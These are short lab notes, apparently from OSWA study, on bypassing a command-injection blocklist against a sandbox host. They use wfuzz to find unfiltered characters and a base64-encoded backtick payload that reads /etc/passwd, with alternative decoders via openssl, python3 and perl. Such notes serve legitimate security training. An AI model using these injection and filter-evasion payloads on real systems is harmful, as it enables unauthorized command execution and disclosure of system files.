Enumerate Blocklist:

1. First use wfuzz to fuzz the parameter: wfuzz -c -z file,/home/kali/oswa/commandinjection/command_injection_custom.txt --hc 404 http://ci-sandbox:80/php/blocklisted.php?ip=127.0.0.1FUZZ

2. Hide the response length of failed ones using --hh: wfuzz -c -z file,/home/kali/oswa/commandinjection/command_injection_custom.txt --hc 404 --hh 1156 http://ci-sandbox:80/php/blocklisted.php?ip=127.0.0.1FUZZ

3. Repeat step 2 until you see one that works.

Base64 Encode: (need backtick `)

1. Run this on our attacker machine first: echo "cat /etc/passwd" | base64

2. Use the base64 encoded as the payload: ;`echo%20%22Y2F0IC9ldGMvcGFzc3dkCg==%22%20|base64%20-d`

3. Alternatively if base64 binary is not available: `echo -n "d2hvYW1p" | openssl base64 -d -A` `echo -n "d2hvYW1p" | python3 -m base64 -d` `echo -n "d2hvYW1p" | perl -MMIME::Base64 -ne 'print decode_base64($_)'`